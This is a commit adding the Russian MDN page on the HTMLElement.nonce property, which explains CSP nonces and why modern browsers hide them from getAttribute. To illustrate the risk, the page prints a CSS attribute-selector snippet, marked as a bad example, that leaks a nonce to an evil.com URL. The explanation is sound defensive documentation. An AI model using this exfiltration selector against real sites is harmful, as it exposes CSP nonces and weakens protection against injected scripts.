[ru] add Web/API/HTMLElement/nonce document (#17319)

[ru] add 'Web/API/HTMLElement/nonce' document
mdn · Dec 7, 2023 · c9c27e2 · c9c27e2
1 parent 9f7ddfe
commit c9c27e2
Showing 1 changed file with 46 additions and 0 deletions.
diff --git a/files/ru/web/api/htmlelement/nonce/index.md b/files/ru/web/api/htmlelement/nonce/index.md
@@ -0,0 +1,46 @@
+---
+title: "HTMLElement: свойство nonce"
+slug: Web/API/HTMLElement/nonce
+l10n:
+  sourceCommit: a3d9f61a8990ba7b53bda9748d1f26a9e9810b18
+---
+
+{{APIRef("HTML DOM")}}
+
+Свойство **`nonce`** интерфейса {{DOMxRef("HTMLElement")}} возвращает одноразовое криптографическое число используемое в [Content Security Policy](/ru/docs/Web/HTTP/CSP) для определения возможности продолжения обработки запроса.
+
+В современных реализациях элементы предоставляют свой атрибут `nonce` только скриптам (но не CSS-селекторам, например).
+
+## Примеры
+
+### Получение значения nonce
+
+В прошлом не все браузеры поддерживали IDL-атрибут `nonce`, поэтому было распространено использование [`getAttribute`](/ru/docs/Web/API/Element/getAttribute) в качестве запасного варианта:
+
+```js
+let nonce = script["nonce"] || script.getAttribute("nonce");
+```
+
+Современные браузеры не дают получить значения `nonce` таким путём (будет возвращена пустая строка). IDL-свойство (`script['nonce']`) является единственным способом получения `nonce`.
+
+Скрытие `nonce` помогает предотвратить их получение злоумышленниками с помощью механизмов, которые могут собирать данные из атрибутов содержимого, таких как этот селектор CSS:
+
+```css example-bad
+script[nonce~="whatever"] {
+  background: url("https://evil.com/nonce?whatever");
+}
+```
+
+## Спецификации
+
+{{Specifications}}
+
+## Совместимость с браузерами
+
+{{Compat}}
+
+## Смотрите также
+
+- [Глобальный атрибут `nonce`](/ru/docs/Web/HTML/Global_attributes/nonce)
+- [Content Security Policy](/ru/docs/Web/HTTP/CSP)
+- CSP: {{CSP("script-src")}}